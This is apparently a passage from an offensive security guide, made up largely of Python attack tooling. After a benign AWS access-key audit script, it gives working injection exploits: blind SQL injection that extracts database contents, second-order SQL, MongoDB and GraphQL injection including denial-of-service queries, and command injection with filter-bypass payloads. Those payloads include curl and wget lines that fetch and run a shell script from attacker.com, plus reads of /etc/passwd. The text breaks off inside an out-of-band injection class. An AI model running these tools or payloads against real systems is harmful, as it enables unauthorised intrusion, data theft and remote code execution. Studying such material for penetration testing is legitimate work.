AWS Secret Scanning & Remediation

#!/usr/bin/env python3
"""
AWS Secret Scanner - Find exposed AWS credentials
"""
import boto3
import re
import json
from datetime import datetime
from botocore.exceptions import ClientError

class AWSSecretScanner:
    def __init__(self, aws_profile='default'):
        self.session = boto3.Session(profile_name=aws_profile)
        self.iam = self.session.client('iam')
        self.sts = self.session.client('sts')
        
    def scan_for_exposed_keys(self):
        """Scan for potentially exposed AWS keys"""
        findings = []
        
        # 1. List all IAM users
        users = self.iam.list_users()
        
        for user in users['Users']:
            username = user['UserName']
            
            # 2. Get access keys for each user
            try:
                keys = self.iam.list_access_keys(UserName=username)
                
                for key in keys['AccessKeyMetadata']:
                    key_id = key['AccessKeyId']
                    status = key['Status']
                    create_date = key['CreateDate']
                    
                    # 3. Check key age
                    key_age = (datetime.now() - create_date.replace(tzinfo=None)).days
                    
                    # 4. Check last used
                    try:
                        last_used = self.iam.get_access_key_last_used(AccessKeyId=key_id)
                        last_used_date = last_used['AccessKeyLastUsed'].get('LastUsedDate')
                        
                        if last_used_date:
                            days_since_use = (datetime.now() - last_used_date.replace(tzinfo=None)).days
                        else:
                            days_since_use = key_age
                    except:
                        days_since_use = key_age
                    
                    # 5. Check for rotation policy violation
                    if key_age > 90:  # 90-day rotation policy
                        findings.append({
                            'severity': 'HIGH',
                            'user': username,
                            'key_id': key_id,
                            'issue': f'Access key not rotated in {key_age} days',
                            'key_age_days': key_age,
                            'last_used_days': days_since_use
                        })
                    
                    # 6. Check for unused keys
                    if days_since_use > 180:
                        findings.append({
                            'severity': 'MEDIUM',
                            'user': username,
                            'key_id': key_id,
                            'issue': f'Access key unused for {days_since_use} days',
                            'key_age_days': key_age,
                            'last_used_days': days_since_use
                        })
            
            except ClientError as e:
                print(f"Error checking keys for {username}: {e}")
        
        return findings
    
    def check_key_exposure(self, key_id, secret_key):
        """Check if key is exposed (simulated - would use internal checks)"""
        # In reality, this would check internal logs, GitHub, etc.
        # For demo, we'll simulate
        exposed_indicators = [
            'Commit history',
            'Public repository',
            'Log files',
            'Environment variables in screenshots'
        ]
        
        return {
            'key_id': key_id,
            'exposed': False,  # Placeholder
            'indicators': []
        }
    
    def generate_remediation(self, findings):
        """Generate remediation steps"""
        remediation = []
        
        for finding in findings:
            if finding['severity'] == 'HIGH':
                remediation.append({
                    'action': f"Rotate access key {finding['key_id']} for user {finding['user']}",
                    'steps': [
                        f"Create new access key for {finding['user']}",
                        f"Update applications using {finding['key_id']}",
                        f"Disable {finding['key_id']} after migration",
                        f"Delete {finding['key_id']} after 7 days"
                    ]
                })
        
        return remediation

# Usage
scanner = AWSSecretScanner('production')
findings = scanner.scan_for_exposed_keys()
remediation = scanner.generate_remediation(findings)

print(json.dumps(findings, indent=2, default=str))

Chapter 3: Injection Attacks - Modern Techniques

3.1 Advanced SQL Injection

Time-Based Blind SQLi Automation

#!/usr/bin/env python3
"""
Advanced Time-Based Blind SQL Injection Exploitation
Supports multiple databases with conditional timing
"""
import requests
import time
import string
from urllib.parse import quote
from concurrent.futures import ThreadPoolExecutor, as_completed

class TimeBasedSQLi:
    def __init__(self, target_url, param_name, injection_point):
        self.target_url = target_url
        self.param_name = param_name
        self.injection_point = injection_point
        self.delay = 5  # Base delay in seconds
        self.threshold = 0.5  # Time difference threshold
        self.session = requests.Session()
        
        # Database-specific payloads
        self.db_payloads = {
            'mysql': {
                'true': f"SLEEP({self.delay})",
                'false': f"SLEEP(0)",
                'conditional': f"IF({{condition}},SLEEP({self.delay}),SLEEP(0))"
            },
            'postgresql': {
                'true': f"pg_sleep({self.delay})",
                'false': f"pg_sleep(0)",
                'conditional': f"CASE WHEN {{condition}} THEN pg_sleep({self.delay}) ELSE pg_sleep(0) END"
            },
            'mssql': {
                'true': f"WAITFOR DELAY '0:0:{self.delay}'",
                'false': f"WAITFOR DELAY '0:0:0'",
                'conditional': f"; IF {{condition}} WAITFOR DELAY '0:0:{self.delay}'--"
            },
            'oracle': {
                'true': f"dbms_pipe.receive_message('a',{self.delay})",
                'false': f"dbms_pipe.receive_message('a',0)",
                'conditional': f"BEGIN IF {{condition}} THEN dbms_pipe.receive_message('a',{self.delay}); ELSE dbms_pipe.receive_message('a',0); END IF; END;"
            }
        }
    
    def detect_database(self):
        """Identify the database type"""
        detected_db = None
        max_time = 0
        
        for db_type, payloads in self.db_payloads.items():
            payload = f"' OR {payloads['true']}--"
            test_url = self.build_url(payload)
            
            start_time = time.time()
            try:
                response = self.session.get(test_url, timeout=self.delay + 2)
                elapsed = time.time() - start_time
                
                if elapsed >= self.delay - self.threshold:
                    detected_db = db_type
                    break
            except:
                continue
        
        return detected_db
    
    def extract_data(self, query, db_type):
        """Extract data character by character using binary search"""
        charset = string.printable
        result = ""
        position = 1
        
        while True:
            low = 0
            high = len(charset) - 1
            found_char = None
            
            while low <= high:
                mid = (low + high) // 2
                current_char = charset[mid]
                
                # Build condition: ASCII value comparison
                condition = f"ASCII(SUBSTRING(({query}),{position},1)) > {ord(current_char)}"
                payload = self.db_payloads[db_type]['conditional'].format(condition=condition)
                injection = f"' OR {payload}--"
                
                test_url = self.build_url(injection)
                start_time = time.time()
                
                try:
                    response = self.session.get(test_url, timeout=self.delay + 2)
                    elapsed = time.time() - start_time
                    
                    if elapsed >= self.delay - self.threshold:
                        # Condition true, search upper half
                        low = mid + 1
                    else:
                        # Condition false, search lower half
                        high = mid - 1
                except Exception as e:
                    print(f"Error: {e}")
                    break
            
            if low > high and low < len(charset):
                found_char = charset[low]
                result += found_char
                print(f"[+] Found: {result}")
                position += 1
            else:
                break
        
        return result
    
    def parallel_extraction(self, queries, db_type, max_workers=5):
        """Extract multiple pieces of data in parallel"""
        results = {}
        
        with ThreadPoolExecutor(max_workers=max_workers) as executor:
            future_to_query = {
                executor.submit(self.extract_data, query, db_type): query 
                for query in queries
            }
            
            for future in as_completed(future_to_query):
                query = future_to_query[future]
                try:
                    data = future.result()
                    results[query] = data
                except Exception as e:
                    results[query] = f"Error: {e}"
        
        return results
    
    def build_url(self, payload):
        """Construct the target URL with injection"""
        # Handle different injection points
        if self.injection_point == 'query':
            return f"{self.target_url}?{self.param_name}={quote(payload)}"
        elif self.injection_point == 'cookie':
            # Return session with modified cookie
            self.session.cookies.set(self.param_name, payload)
            return self.target_url
        else:
            return self.target_url.replace('INJECTION_POINT', quote(payload))

# Usage example
sqli = TimeBasedSQLi(
    target_url="http://target.com/search",
    param_name="q",
    injection_point="query"
)

# Detect database
db_type = sqli.detect_database()
print(f"[*] Detected database: {db_type}")

# Extract data
queries = [
    "SELECT user()",
    "SELECT database()",
    "SELECT @@version",
    "SELECT table_name FROM information_schema.tables LIMIT 5"
]

results = sqli.parallel_extraction(queries, db_type)
for query, result in results.items():
    print(f"[*] {query}: {result}")

Second-Order SQL Injection Detection

#!/usr/bin/env python3
"""
Second-Order SQL Injection Detection
Tests for stored/triggered SQL injection attacks
"""
import requests
import time
from urllib.parse import urljoin

class SecondOrderSQLiDetector:
    def __init__(self, base_url, session_cookies=None):
        self.base_url = base_url
        self.session = requests.Session()
        if session_cookies:
            self.session.cookies.update(session_cookies)
        
        self.payloads = [
            # Classic second-order payloads
            "admin'--",
            "admin' OR '1'='1",
            "test'; DROP TABLE users--",
            
            # Time-based for detection
            "test'; WAITFOR DELAY '0:0:5'--",
            "test' AND SLEEP(5)--",
            
            # Error-based
            "test' AND 1=CONVERT(int, @@version)--",
            
            # Union-based (for when triggered)
            "test' UNION SELECT NULL--"
        ]
    
    def test_registration_flow(self):
        """Test user registration -> login flow"""
        findings = []
        
        for payload in self.payloads:
            print(f"[*] Testing payload: {payload}")
            
            # 1. Register with malicious payload
            reg_data = {
                'username': f'test_{int(time.time())}',
                'email': f'{payload}@test.com',
                'password': 'Password123!'
            }
            
            reg_response = self.session.post(
                urljoin(self.base_url, '/register'),
                data=reg_data
            )
            
            if reg_response.status_code == 200:
                # 2. Attempt login (might trigger second-order)
                login_data = {
                    'email': f'{payload}@test.com',
                    'password': 'Password123!'
                }
                
                start_time = time.time()
                login_response = self.session.post(
                    urljoin(self.base_url, '/login'),
                    data=login_data
                )
                elapsed = time.time() - start_time
                
                # 3. Analyze response
                if elapsed > 5:  # Time-based detection
                    findings.append({
                        'type': 'time_based',
                        'payload': payload,
                        'delay': elapsed,
                        'vector': 'registration->login'
                    })
                
                if 'error' in login_response.text.lower() and 'sql' in login_response.text.lower():
                    findings.append({
                        'type': 'error_based',
                        'payload': payload,
                        'response_snippet': login_response.text[:200],
                        'vector': 'registration->login'
                    })
            
            time.sleep(1)  # Rate limiting
        
        return findings
    
    def test_profile_update(self):
        """Test profile update -> display flow"""
        findings = []
        
        # First, create a normal user
        user_data = {
            'username': f'victim_{int(time.time())}',
            'email': 'victim@test.com',
            'password': 'Password123!'
        }
        
        self.session.post(
            urljoin(self.base_url, '/register'),
            data=user_data
        )
        
        # Login
        self.session.post(
            urljoin(self.base_url, '/login'),
            data={'email': 'victim@test.com', 'password': 'Password123!'}
        )
        
        # Update profile with malicious payload
        for payload in self.payloads:
            update_data = {
                'display_name': payload,
                'bio': f'Bio with {payload}'
            }
            
            update_response = self.session.post(
                urljoin(self.base_url, '/profile/update'),
                data=update_data
            )
            
            if update_response.status_code == 200:
                # View profile (might trigger second-order)
                start_time = time.time()
                profile_response = self.session.get(
                    urljoin(self.base_url, '/profile')
                )
                elapsed = time.time() - start_time
                
                if elapsed > 5:
                    findings.append({
                        'type': 'time_based',
                        'payload': payload,
                        'delay': elapsed,
                        'vector': 'profile_update->display'
                    })
                
                if any(err in profile_response.text.lower() 
                      for err in ['sql', 'database', 'syntax']):
                    findings.append({
                        'type': 'error_based',
                        'payload': payload,
                        'vector': 'profile_update->display'
                    })
        
        return findings
    
    def automated_detection(self):
        """Run all second-order SQLi tests"""
        all_findings = []
        
        print("[*] Testing registration -> login flow")
        all_findings.extend(self.test_registration_flow())
        
        print("[*] Testing profile update -> display flow")
        all_findings.extend(self.test_profile_update())
        
        # Additional test vectors
        test_vectors = [
            ('/comment', 'content', '/comments'),  # Comment -> display
            ('/product/review', 'review', '/product'),  # Review -> product page
            ('/ticket/create', 'description', '/ticket/view')  # Ticket create -> view
        ]
        
        for create_endpoint, param_name, trigger_endpoint in test_vectors:
            print(f"[*] Testing {create_endpoint} -> {trigger_endpoint}")
            findings = self.test_generic_flow(create_endpoint, param_name, trigger_endpoint)
            all_findings.extend(findings)
        
        return all_findings
    
    def test_generic_flow(self, create_endpoint, param_name, trigger_endpoint):
        """Test a generic create -> trigger flow"""
        findings = []
        
        for payload in self.payloads[:3]:  # Test first 3 payloads
            # Create resource with payload
            data = {param_name: payload, 'title': 'Test'}
            create_response = self.session.post(
                urljoin(self.base_url, create_endpoint),
                data=data
            )
            
            if create_response.status_code in [200, 201]:
                # Trigger the second-order
                start_time = time.time()
                trigger_response = self.session.get(
                    urljoin(self.base_url, trigger_endpoint)
                )
                elapsed = time.time() - start_time
                
                if elapsed > 5:
                    findings.append({
                        'type': 'time_based',
                        'payload': payload,
                        'delay': elapsed,
                        'vector': f'{create_endpoint}->{trigger_endpoint}'
                    })
        
        return findings

# Usage
detector = SecondOrderSQLiDetector("http://target.com")
findings = detector.automated_detection()

for finding in findings:
    print(f"[!] Found second-order SQLi: {finding}")

3.2 NoSQL Injection Advanced Techniques

MongoDB Injection Beyond $where

#!/usr/bin/env python3
"""
Advanced MongoDB NoSQL Injection Testing
Covers aggregation pipelines, $function, MapReduce, etc.
"""
import requests
import json
from urllib.parse import quote

class MongoDBInjector:
    def __init__(self, target_url, param_name='query'):
        self.target_url = target_url
        self.param_name = param_name
        self.session = requests.Session()
        
        # Advanced MongoDB payloads
        self.payloads = {
            'authentication_bypass': [
                # Classic
                '{"$ne": null}',
                '{"$gt": ""}',
                '{"$regex": ".*"}',
                
                # Using $where with JavaScript
                '{"$where": "true"}',
                '{"$where": "1 == 1"}',
                
                # Using $expr
                '{"$expr": {"$eq": [1, 1]}}',
            ],
            
            'data_extraction': [
                # Extract all documents
                '{"$where": "this.username == \\\"admin\\\""}',
                
                # Using $function in aggregation
                '{"$function": "function() { return this.password; }"}',
                
                # MapReduce injection
                '{"map": "function() { emit(this.username, this.password); }"}',
            ],
            
            'javascript_execution': [
                # Direct JavaScript execution
                '{"$where": "sleep(5000) || true"}',
                '{"$where": "d = new Date(); do {cur = new Date();} while(cur - d < 5000)"}',
                
                # Using $function with sleep
                '{"$function": "function() { var d = new Date(); while(new Date() - d < 5000) {}; return true; }"}',
            ],
            
            'aggregation_pipeline': [
                # Malicious aggregation stages
                '[{"$match": {"username": {"$ne": null}}}, {"$project": {"password": 1}}]',
                
                # Using $addFields to leak data
                '[{"$addFields": {"leaked": "$password"}}]',
                
                # $lookup with malicious pipeline
                '[{"$lookup": {"from": "users", "pipeline": [{"$project": {"password": 1}}], "as": "leaked"}}]',
            ]
        }
    
    def test_injection_point(self, method='GET', data_type='json'):
        """Test for NoSQL injection vulnerabilities"""
        vulnerabilities = []
        
        for category, payload_list in self.payloads.items():
            for payload in payload_list:
                print(f"[*] Testing {category}: {payload[:50]}...")
                
                if method.upper() == 'GET':
                    # URL encode for GET
                    test_url = f"{self.target_url}?{self.param_name}={quote(payload)}"
                    response = self.session.get(test_url)
                else:
                    # POST with different content types
                    if data_type == 'json':
                        headers = {'Content-Type': 'application/json'}
                        data = json.dumps({self.param_name: json.loads(payload)})
                    else:  # form data
                        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
                        data = {self.param_name: payload}
                    
                    response = self.session.post(
                        self.target_url,
                        data=data,
                        headers=headers
                    )
                
                # Analyze response
                if self.is_successful_injection(response, category):
                    vulnerabilities.append({
                        'category': category,
                        'payload': payload,
                        'status_code': response.status_code,
                        'response_time': response.elapsed.total_seconds(),
                        'indicators': self.extract_indicators(response)
                    })
        
        return vulnerabilities
    
    def is_successful_injection(self, response, category):
        """Determine if injection was successful"""
        indicators = {
            'authentication_bypass': [
                response.status_code in [200, 302],
                'logout' in response.text,
                'Welcome' in response.text,
                'Invalid credentials' not in response.text
            ],
            
            'data_extraction': [
                'password' in response.text.lower(),
                'email' in response.text.lower(),
                'admin' in response.text,
                len(response.json()) > 0 if self.is_json(response) else False
            ],
            
            'javascript_execution': [
                response.elapsed.total_seconds() > 5,
                'timeout' in response.text.lower()
            ]
        }
        
        if category in indicators:
            return any(indicators[category])
        
        return False
    
    def blind_injection(self, conditional_payloads):
        """Perform blind NoSQL injection"""
        extracted_data = ""
        charset = "abcdefghijklmnopqrstuvwxyz0123456789"
        
        for i in range(1, 50):  # Extract up to 50 characters
            found_char = None
            
            for char in charset:
                # Build condition: if character at position i equals char
                condition = f'this.password.charAt({i-1}) == "{char}"'
                payload = f'{{"$where": "{condition}"}}'
                
                start_time = time.time()
                response = self.session.post(
                    self.target_url,
                    json={'query': json.loads(payload)},
                    timeout=10
                )
                elapsed = time.time() - start_time
                
                # If condition true (admin user exists), we might get different response time
                if elapsed > 2:  # Threshold for time-based
                    found_char = char
                    extracted_data += char
                    print(f"[+] Found char {i}: {char}")
                    break
            
            if not found_char:
                break
        
        return extracted_data
    
    def test_operator_injection(self):
        """Test for MongoDB operator injection"""
        operators = [
            # Comparison
            '$eq', '$ne', '$gt', '$gte', '$lt', '$lte', '$in', '$nin',
            # Logical
            '$and', '$or', '$not', '$nor',
            # Element
            '$exists', '$type',
            # Evaluation
            '$expr', '$jsonSchema', '$mod', '$regex', '$text', '$where',
            # Geospatial
            '$geoIntersects', '$geoWithin', '$near', '$nearSphere',
            # Array
            '$all', '$elemMatch', '$size',
            # Bitwise
            '$bitsAllClear', '$bitsAllSet', '$bitsAnyClear', '$bitsAnySet'
        ]
        
        vulnerabilities = []
        
        for operator in operators:
            # Test if operator can be injected
            payload = f'{{"{operator}": [1, 1]}}'
            
            response = self.session.post(
                self.target_url,
                json={'filter': json.loads(payload)}
            )
            
            # Check if operator was processed
            if response.status_code == 200:
                try:
                    data = response.json()
                    # Look for signs of operator execution
                    if data and len(data) > 0:
                        vulnerabilities.append({
                            'operator': operator,
                            'payload': payload,
                            'result_count': len(data)
                        })
                except:
                    pass
        
        return vulnerabilities

# Usage
injector = MongoDBInjector("http://target.com/api/users")
vulns = injector.test_injection_point(method='POST', data_type='json')

for vuln in vulns:
    print(f"[!] Vulnerability found: {vuln['category']}")

GraphQL Injection Techniques

#!/usr/bin/env python3
"""
GraphQL Injection Testing Framework
Includes introspection abuse, query batching, and persisted query attacks
"""
import requests
import json
import re

class GraphQLInjector:
    def __init__(self, endpoint, headers=None):
        self.endpoint = endpoint
        self.headers = headers or {'Content-Type': 'application/json'}
        self.session = requests.Session()
        
    def introspection_abuse(self):
        """Abuse GraphQL introspection to gather schema information"""
        introspection_query = """
        query IntrospectionQuery {
          __schema {
            types {
              name
              kind
              description
              fields {
                name
                description
                type {
                  name
                  kind
                  ofType { name kind }
                }
                args {
                  name
                  description
                  type { name kind ofType { name kind } }
                  defaultValue
                }
              }
            }
          }
        }
        """
        
        response = self.session.post(
            self.endpoint,
            json={'query': introspection_query},
            headers=self.headers
        )
        
        if response.status_code == 200:
            schema = response.json()
            
            # Extract sensitive fields
            sensitive_fields = self.find_sensitive_fields(schema)
            
            # Generate malicious queries based on schema
            malicious_queries = self.generate_malicious_queries(schema)
            
            return {
                'schema_obtained': True,
                'sensitive_fields': sensitive_fields,
                'malicious_queries': malicious_queries[:5]  # First 5
            }
        
        return {'schema_obtained': False}
    
    def find_sensitive_fields(self, schema):
        """Identify potentially sensitive fields in schema"""
        sensitive_keywords = [
            'password', 'email', 'token', 'secret', 'key',
            'credit', 'card', 'ssn', 'address', 'phone',
            'admin', 'role', 'permission', 'salary', 'private'
        ]
        
        sensitive = []
        for type_info in schema.get('data', {}).get('__schema', {}).get('types', []):
            if type_info.get('fields'):
                for field in type_info['fields']:
                    field_name = field.get('name', '').lower()
                    field_desc = field.get('description', '').lower()
                    
                    if any(keyword in field_name or keyword in field_desc 
                          for keyword in sensitive_keywords):
                        sensitive.append({
                            'type': type_info['name'],
                            'field': field['name'],
                            'description': field.get('description', '')
                        })
        
        return sensitive
    
    def generate_malicious_queries(self, schema):
        """Generate potentially malicious queries based on schema"""
        queries = []
        
        # 1. Query for all data
        for type_info in schema.get('data', {}).get('__schema', {}).get('types', []):
            if type_info.get('fields') and not type_info['name'].startswith('__'):
                # Build query to get all fields of this type
                fields = [field['name'] for field in type_info['fields']]
                query = f"query {{ {type_info['name'].lower()} {{ {' '.join(fields)} }} }}"
                queries.append(query)
        
        # 2. Nested queries (depth exploitation)
        queries.append("""
        query {
          users {
            id
            email
            posts {
              id
              content
              comments {
                id
                content
                author {
                  id
                  email
                }
              }
            }
          }
        }
        """)
        
        # 3. Batch queries (query batching attack)
        batch_query = []
        for i in range(100):
            batch_query.append({
                'query': 'query { __typename }'
            })
        
        queries.append(json.dumps(batch_query))
        
        return queries
    
    def test_query_complexity(self):
        """Test for query complexity/DoS vulnerabilities"""
        # Very deep query
        deep_query = "query { " + "a { " * 100 + "__typename" + " }" * 100 + " }"
        
        # Very wide query
        wide_query = "query { " + " ".join([f"field{i}: __typename" for i in range(1000)]) + " }"
        
        queries = [
            ('deep', deep_query),
            ('wide', wide_query)
        ]
        
        results = []
        for name, query in queries:
            try:
                response = self.session.post(
                    self.endpoint,
                    json={'query': query},
                    headers=self.headers,
                    timeout=30
                )
                
                results.append({
                    'test': name,
                    'status_code': response.status_code,
                    'response_time': response.elapsed.total_seconds(),
                    'error': 'timeout' if response.elapsed.total_seconds() > 29 else None
                })
            except requests.exceptions.Timeout:
                results.append({
                    'test': name,
                    'status_code': 'TIMEOUT',
                    'response_time': 30,
                    'error': 'timeout'
                })
        
        return results
    
    def test_persisted_query_injection(self):
        """Test for persisted query attacks"""
        # Try to guess query IDs
        query_ids = []
        
        for i in range(1000):
            # Common patterns for persisted query IDs
            patterns = [
                f"{i:08x}",  # Hex
                f"{i}",      # Decimal
                f"q{i:04d}", # q0001 format
            ]
            
            for pattern in patterns:
                response = self.session.post(
                    self.endpoint,
                    json={'queryId': pattern},
                    headers=self.headers
                )
                
                if response.status_code == 200:
                    data = response.json()
                    if 'data' in data and not data.get('errors'):
                        query_ids.append({
                            'id': pattern,
                            'response': data.get('data', {})
                        })
        
        return query_ids
    
    def test_field_duplication(self):
        """Test GraphQL field duplication attacks"""
        # Some GraphQL implementations process duplicate fields multiple times
        query = """
        query {
          user(id: "1") {
            email
            email
            email
            email
            email
          }
        }
        """
        
        response = self.session.post(
            self.endpoint,
            json={'query': query},
            headers=self.headers
        )
        
        if response.status_code == 200:
            data = response.json()
            # Check if email appears multiple times
            if 'data' in data:
                user_data = data['data'].get('user', {})
                emails = [v for k, v in user_data.items() if k == 'email']
                if len(emails) > 1:
                    return {
                        'vulnerable': True,
                        'duplicate_count': len(emails),
                        'values': emails
                    }
        
        return {'vulnerable': False}
    
    def automated_injection_test(self):
        """Run all GraphQL injection tests"""
        results = {}
        
        print("[*] Testing introspection access")
        results['introspection'] = self.introspection_abuse()
        
        print("[*] Testing query complexity limits")
        results['complexity'] = self.test_query_complexity()
        
        print("[*] Testing persisted query attacks")
        results['persisted_queries'] = self.test_persisted_query_injection()
        
        print("[*] Testing field duplication")
        results['field_duplication'] = self.test_field_duplication()
        
        # Test for SQL injection through GraphQL arguments
        print("[*] Testing SQL injection in GraphQL arguments")
        results['sqli'] = self.test_graphql_sqli()
        
        return results
    
    def test_graphql_sqli(self):
        """Test for SQL injection in GraphQL arguments"""
        sqli_payloads = [
            "' OR '1'='1",
            "admin'--",
            "1; DROP TABLE users--",
            "1' AND SLEEP(5)--"
        ]
        
        vulnerable_endpoints = []
        
        # Get schema first to know what queries are available
        schema = self.introspection_abuse()
        
        if schema.get('schema_obtained'):
            # Look for queries with string arguments
            for type_info in schema.get('types', []):
                if type_info.get('fields'):
                    for field in type_info['fields']:
                        if field.get('args'):
                            for arg in field['args']:
                                arg_type = arg.get('type', {}).get('name', '')
                                if arg_type == 'String':
                                    # Test this argument
                                    query = f"""
                                    query {{
                                      {field['name']}({arg['name']}: "PAYLOAD") {{
                                        id
                                      }}
                                    }}
                                    """
                                    
                                    for payload in sqli_payloads:
                                        test_query = query.replace('PAYLOAD', payload)
                                        
                                        response = self.session.post(
                                            self.endpoint,
                                            json={'query': test_query},
                                            headers=self.headers,
                                            timeout=10
                                        )
                                        
                                        if response.status_code == 200:
                                            data = response.json()
                                            errors = data.get('errors', [])
                                            
                                            # Check for SQL errors
                                            if any('sql' in str(error).lower() or 
                                                   'syntax' in str(error).lower() 
                                                   for error in errors):
                                                vulnerable_endpoints.append({
                                                    'query': field['name'],
                                                    'argument': arg['name'],
                                                    'payload': payload,
                                                    'error': str(errors[0])[:200]
                                                })
        
        return vulnerable_endpoints

# Usage
gql = GraphQLInjector("http://target.com/graphql", 
                      headers={'Authorization': 'Bearer token'})

results = gql.automated_injection_test()
print(json.dumps(results, indent=2))

3.3 Command Injection Evolution

Advanced Command Injection with Filter Bypass

#!/usr/bin/env python3
"""
Advanced Command Injection Techniques with Filter Bypass
Includes encoding, whitespace variations, and command chaining
"""
import requests
import urllib.parse
import string

class CommandInjector:
    def __init__(self, target_url, vulnerable_param):
        self.target_url = target_url
        self.vulnerable_param = vulnerable_param
        self.session = requests.Session()
        
        # Command injection payloads with various bypass techniques
        self.payloads = {
            'basic': [
                ';id',
                '|id',
                '&id',
                '&&id',
                '||id',
                '`id`',
                '$(id)',
                '){id}',
            ],
            
            'whitespace_variations': [
                'id',
                'id',
                'i\\d',
                'i\\\td',
                'i\\\nd',
                '{i,d}',
                'i$@d',
                'i$()d',
                'i${IFS}d',
            ],
            
            'encoding': [
                # URL encoding
                '%3bid',
                '%7cid',
                '%26id',
                '%60id%60',
                '%24%28id%29',
                
                # Double URL encoding
                '%253bid',
                '%257cid',
                
                # Hex encoding
                '\\x3bid',
                '\\x7cid',
                
                # Octal encoding
                '\\073id',
                '\\174id',
                
                # Unicode encoding
                '%u003bid',
                '%u007cid',
            ],
            
            'case_variation': [
                'Id',
                'iD',
                'ID',
                'Id',
            ],
            
            'command_concatenation': [
                'i''d',
                'i""d',
                'i\'\'d',
                'i$@d',
            ],
            
            'environment_variables': [
                '${PATH:0:1}id',
                '${LS_COLORS:10:1}id',
                '${PWD:0:1}id',
            ],
            
            'advanced_chaining': [
                '; id; #',
                '| id |',
                '& id &',
                '&& id &&',
                '|| id ||',
                '`id` #',
                '$(id) #',
                '){ id; }',
                '; id && echo vulnerable',
                '| id | grep -i root',
                '& cat /etc/passwd &',
                '; ping -c 1 attacker.com;',
                '; curl attacker.com/shell.sh | bash;',
                '; wget attacker.com/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh;',
            ],
            
            'blind_injection': [
                '; sleep 5;',
                '| sleep 5 |',
                '& sleep 5 &',
                '`sleep 5`',
                '$(sleep 5)',
                '; ping -c 5 127.0.0.1;',
                '; cat /dev/zero | head -c 1000000;',
            ],
            
            'filter_bypass': [
                # Bypass "cat" filter
                'c\\at',
                'c""at',
                'c\'\'at',
                'c$@at',
                'c${IFS}at',
                'ca\t',
                'c\\a\\t',
                '/???/??t',  # /bin/cat
                '/?in/?at',
                
                # Bypass space filter
                'cat${IFS}/etc/passwd',
                'cat</etc/passwd',
                'cat<>/etc/passwd',
                '{cat,/etc/passwd}',
                'cat$@/etc/passwd',
                'X=$'\x20'&&cat$X/etc/passwd',
                
                # Bypass slash filter
                'cat /etc/passwd',
                'cat etc/passwd',  # Relative path
                'cat .//etc//passwd',
                'cat /???/??????',  # /etc/passwd
                
                # Bypass keyword filters with encoding
                '$(echo${IFS}Y2F0IC9ldGMvcGFzc3dkCg==|base64${IFS}-d|bash)',
                '`echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d`',
            ]
        }
    
    def test_all_payloads(self, base_value='127.0.0.1'):
        """Test all payload categories"""
        results = {}
        
        for category, payload_list in self.payloads.items():
            print(f"[*] Testing {category} payloads")
            category_results = []
            
            for payload in payload_list:
                # Construct the injection
                if base_value:
                    injection = f"{base_value}{payload}"
                else:
                    injection = payload
                
                # Test the injection
                result = self.test_payload(injection)
                
                if result['indicators']['injection_detected']:
                    category_results.append({
                        'payload': payload,
                        'response_time': result['response_time'],
                        'status_code': result['status_code'],
                        'indicators': result['indicators']['detected_indicators']
                    })
            
            results[category] = category_results
        
        return results
    
    def test_payload(self, injection):
        """Test a single payload"""
        # URL encode if needed
        encoded_injection = urllib.parse.quote(injection)
        
        # Construct request
        params = {self.vulnerable_param: injection}
        
        # Measure response time for blind injection detection
        import time
        start_time = time.time()
        
        try:
            response = self.session.get(
                self.target_url,
                params=params,
                timeout=10
            )
            response_time = time.time() - start_time
            
            # Analyze response for injection indicators
            indicators = self.analyze_response(response, response_time)
            
            return {
                'payload': injection,
                'status_code': response.status_code,
                'response_time': response_time,
                'response_length': len(response.text),
                'indicators': indicators
            }
        
        except requests.exceptions.Timeout:
            return {
                'payload': injection,
                'status_code': 'TIMEOUT',
                'response_time': 10,
                'indicators': {'injection_detected': True, 'timeout': True}
            }
    
    def analyze_response(self, response, response_time):
        """Analyze response for command injection indicators"""
        indicators = {
            'injection_detected': False,
            'detected_indicators': []
        }
        
        response_text = response.text.lower()
        
        # Check for command output in response
        command_output_indicators = [
            'root:x:0:0',
            'uid=',
            'gid=',
            'groups=',
            'bin/bash',
            '/home/',
            'www-data',
            'daemon',
            'nobody',
            'Linux',
            'Unix',
            'kernel',
            'total ',
            'drwx',
            '-rw-',
            'ls: cannot access',
            'command not found',
            'Permission denied',
            'No such file or directory'
        ]
        
        for indicator in command_output_indicators:
            if indicator in response_text:
                indicators['detected_indicators'].append(indicator)
                indicators['injection_detected'] = True
        
        # Check for time-based indicators
        if response_time > 4.5:  # For sleep 5 payloads
            indicators['detected_indicators'].append(f'Time delay: {response_time}s')
            indicators['injection_detected'] = True
        
        # Check for error messages that indicate command execution
        error_indicators = [
            'sh:',
            'bash:',
            'dash:',
            'ksh:',
            'zsh:',
            '/bin/sh:',
            '/bin/bash:'
        ]
        
        for error in error_indicators:
            if error in response_text:
                indicators['detected_indicators'].append(error)
                indicators['injection_detected'] = True
        
        return indicators
    
    def automated_exploitation(self, command):
        """Automatically exploit command injection"""
        # Find a working payload first
        working_payloads = []
        
        for category, payload_list in self.payloads.items():
            for payload in payload_list[:5]:  # Test first 5 from each category
                test_result = self.test_payload(f"127.0.0.1{payload}")
                if test_result['indicators']['injection_detected']:
                    working_payloads.append(payload)
                    break
        
        if not working_payloads:
            return {"error": "No working payload found"}
        
        # Use first working payload to execute command
        working_payload = working_payloads[0]
        
        # Encode command if needed (for filters)
        encoded_commands = [
            command,
            f"echo {command} | bash",
            f"echo {command} | sh",
            f"{command} 2>&1",
            f"$(echo {command})"
        ]
        
        results = []
        for cmd in encoded_commands:
            injection = f"127.0.0.1{working_payload.replace('id', cmd)}"
            result = self.test_payload(injection)
            
            if result['indicators']['injection_detected']:
                results.append({
                    'command': cmd,
                    'success': True,
                    'response_preview': result.get('response_text', '')[:500]
                })
            else:
                results.append({
                    'command': cmd,
                    'success': False
                })
        
        return results

# Usage
injector = CommandInjector("http://target.com/ping", "ip")
results = injector.test_all_payloads()

for category, payloads in results.items():
    if payloads:
        print(f"\n[!] {category} - {len(payloads)} successful payloads")
        for p in payloads[:3]:  # Show first 3
            print(f"  - {p['payload']} ({p['response_time']:.2f}s)")

Out-of-Band Command Injection

#!/usr/bin/env python3
"""
Out-of-Band (OOB) Command Injection Detection
Uses DNS, HTTP, and other protocols to confirm injection
"""
import requests
import time
import dns.resolver
from urllib.parse import quote
import subprocess
import threading

class OOBCommandInjector:
    def __init__(self, target_url, param_name, collaborator_url=None):
        self.target_url = target_url
